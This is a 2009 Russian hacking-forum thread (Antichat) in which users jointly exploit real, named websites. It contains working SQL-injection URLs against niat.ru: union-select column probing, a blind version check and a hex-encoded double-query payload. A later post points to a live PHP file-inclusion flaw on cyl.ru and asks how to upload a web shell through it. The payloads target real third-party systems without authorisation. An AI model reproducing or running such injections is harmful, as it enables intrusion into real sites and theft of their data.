11.06.2009, 22:52
|
|
Banned
Регистрация: 14.01.2009
Сообщений: 515
С нами:
9116877
Репутация:
468
|
|
Попробую id=-1[sql]
|
|
|
11.06.2009, 23:30
|
|
Постоянный
Регистрация: 21.02.2007
Сообщений: 568
С нами:
10114465
Репутация:
303
|
|
Сообщение от Krist_ALL
Попробую id=-1[sql]
Пробовал, в этом случае пропадает весь текст, остаётся только костяк сайта, вывода нет(
|
|
|
|
11.06.2009, 23:32
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
С нами:
9593606
Репутация:
4915
|
|
Давай линк, иначе будет гадание на кофейной гуще на 10 страниц
|
|
|
|
11.06.2009, 23:46
|
|
Постоянный
Регистрация: 21.02.2007
Сообщений: 568
С нами:
10114465
Репутация:
303
|
|
_http://www.niat.ru/design/page_rus.php?id=1+union+select+1,2,3,4/*
тока не дефейсить
|
|
|
|
12.06.2009, 00:29
|
|
Постоянный
Регистрация: 06.02.2008
Сообщений: 494
С нами:
9610769
Репутация:
380
|
|
Поле 2 и 3 отвечают за путь до изображения вверху страницы,в поле 3 проходят тока цифры и по всей видимости там либо JOIN либо сабселект или еще одна гверя так как патч до этого изображения по всей видимости береться из бд(потому как если указать от балды значения то путь до изображения идет пустой), а во втором поле идет какой то фильтр на выводимые данные потому как ничего кроме 0x2f(/) и 0x2e(.) в нем не проходят(возможно file_exists() и etc), вывод в 1-ом и 4-ом поле на страницу я не увидел, только блайнд по всей видимости, версия 5 http://www.niat.ru/design/page_rus.php?id=8+and+substring(version(),1,1)=5
|
|
|
|
12.06.2009, 00:30
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
С нами:
9593606
Репутация:
4915
|
|
PaCo куда торопишься? 
http://www.niat.ru/design/page_rus.php?id=11111+union+select+1,2,concat(0x3a 3a3a3a,Version()),4/*
Grey: Джок, тебе повезло, что тут вывод в сообщение об ошибке, но там двойной запрос и в идеале нужно так юзать:
Код:
http://www.niat.ru/design/page_rus.php?id=1+and+1=2+union+select+1,2,0x3120616e6420313d3220756e696f6e2073656c65637420636f6e63617428273e272c76657273696f6e2829292f2a,4/*
Позвольте, что значит повезло? Я увидел там вывод, хотя искал двойной запрос. Есть вывод-нет заморочек
Grey: так не честно 
А вообще ты так можешь паренька сильно загрузить и он может не понять, как так получилось с инъекцией, а это повлечет новые вопросы...
Последний раз редактировалось Grey; 12.06.2009 в 00:42..
|
|
|
|
12.06.2009, 03:36
|
|
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
С нами:
10309346
Репутация:
4303
|
|
пожалуй паренька больше загрузит непонятный хекс в 3-м поле))
Кстати встречал как то подобную скулю
|
|
|
|
12.06.2009, 12:08
|
|
Новичок
Регистрация: 03.06.2009
Сообщений: 24
С нами:
8916053
Репутация:
-4
|
|
привет всем, я понимаю что на мой вопрос полюбому есть ответ в этой теме, но что бы не листать 757 страниц задам его ещё раз.
Как перевести таблицу в кеш?
Раньше пользовался http://nahta4ok.far.ru/tools.php , но вчера он закрыл свой сайт.
Может есть праги?
|
|
|
|
12.06.2009, 12:17
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
С нами:
10585560
Репутация:
1550
|
|
привет всем, я понимаю что на мой вопрос полюбому есть ответ в этой теме, но что бы не листать 757 страниц задам его ещё раз. Как перевести таблицу в кеш? Раньше пользовался http://nahta4ok.far.ru/tools.php , но вчера он закрыл свой сайт. Может есть праги?
а поиск поюзать?
и что за кеш? попробуй http://x3k.ru/ если конечно я тебя правильно понял
|
|
|
|
12.06.2009, 18:28
|
|
Участник форума
Регистрация: 07.08.2008
Сообщений: 281
С нами:
9347610
Репутация:
165
|
|
Здравствуйте, подскажите пожалуйсто как можно залить шел через PHP иньекцию
Вот уязвимый сайт
http://www.cyl.ru/index.php?page=3&lang=../%00
Взял я его из раздела PHP иньекции.
Там уже залит шел, мне просто интеренсно, каким способом.... |
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
